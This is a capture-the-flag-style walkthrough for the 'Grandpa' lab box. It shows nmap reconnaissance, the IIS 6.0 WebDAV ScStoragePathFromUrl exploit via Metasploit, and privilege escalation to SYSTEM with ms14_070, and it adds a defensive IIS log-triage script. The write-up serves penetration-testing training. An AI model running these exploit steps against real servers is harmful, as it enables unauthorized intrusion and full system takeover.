Grandpa (with Meterpreter)

IP: 10.10.10.14

Recon

nmap -T4 -A -p- 10.10.10.14

80 open http Microsoft IIS httpd 6.0

Potentially risky methods: all of them, including TRACE (cross-site tracing) and PUT (uploading files to the server).

Enumeration

Google: Microsoft IIS httpd 6.0 exploit

Searching Exploit-DB turns up the WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow (https://www.exploit-db.com/exploits/41738). According to its description, it requires the WebDAV service to be running on IIS 6.0 on Windows Server 2008 R2.
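From the defender's side, both findings above (risky methods allowed, WebDAV exposed on IIS 6.0) leave traces in the web server's own logs. The following script is an added example, not part of the original write-up: it parses constructed IIS-style W3C log lines and flags risky/WebDAV methods and oversized request paths; the method list, the 255-character threshold and the sample lines are assumptions.

```python
"""Triage IIS W3C-format log lines for the exposure seen on this box:
WebDAV/risky HTTP methods and oversized request paths. Sample is constructed."""
from collections import Counter

# Methods nmap flagged as risky on the target, plus the WebDAV verbs
# IIS 6.0 exposes when WebDAV is enabled (assumed list).
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "MOVE", "COPY", "PROPFIND",
                 "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "SEARCH"}
MAX_URI_LEN = 255  # assumed threshold for an oversized request path

# Constructed sample; the #Fields line names the columns, as in W3C logs.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2017-04-12 10:01:02 10.10.10.14 GET /index.html - 80 10.10.14.5 200
2017-04-12 10:01:09 10.10.10.14 OPTIONS / - 80 10.10.14.5 200
2017-04-12 10:01:15 10.10.10.14 PUT /upload.txt - 80 10.10.14.5 201
2017-04-12 10:01:20 10.10.10.14 PROPFIND /{} - 80 10.10.14.5 500
""".format("A" * 300)

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, parts))

def triage(text):
    """Return (alerts, method_counts): alert strings plus a per-method tally."""
    alerts, counts = [], Counter()
    for rec in parse_w3c(text):
        method, uri = rec["cs-method"], rec["cs-uri-stem"]
        counts[method] += 1
        if method in RISKY_METHODS:
            alerts.append(f"{rec['c-ip']} used {method} on {uri[:40]} "
                          f"(status {rec['sc-status']})")
        if len(uri) > MAX_URI_LEN:
            alerts.append(f"{rec['c-ip']} sent a {len(uri)}-char path via {method}")
    return alerts, counts

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG)[0]:
        print(alert)
```

On a real server the same check runs over the live W3C log directory; default IIS logging records the method, path and status but not request headers, so header-based payloads only show up indirectly (method, path length, error status).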

Running searchsploit against ScStoragePathFromUrl shows that Metasploit has a module for it. Let's try it.

msfconsole
search ScStoragePathFromUrl
use 0
options
set rhosts 10.10.10.14
run

# If it doesn't work, run it again or change lport to 5555

Once inside, run getuid and sysinfo. They show an x86 Meterpreter session without admin privileges.

ps shows the running processes and which user each one runs as. If we were SYSTEM, we would see every user's processes, and getuid would confirm that.

Privilege Escalation

Let's try migrating into a process running as NT AUTHORITY\NETWORK SERVICE to see if that gets us NT AUTHORITY access.

migrate 1788
[*] Migrating from 2876 to 1788
[*] Migration completed successfully.

Phew! That worked, although we are not NT AUTHORITY yet. Let's confirm by using getuid.

Let's background this session and run the local exploit suggester to see if there is another way up.

search suggester
use 0
options
set session 1
run

We get 9 candidates. Let's try ms14_070_tcip_ioctl; alternatively, ms10_015_kitrap0d also works.

use exploit/windows/local/ms14_070_tcip_ioctl
set session 1
set lhost tun0 # resolves to the address of your OpenVPN interface
run

We got a shell! Running getuid shows we are now NT AUTHORITY\SYSTEM.
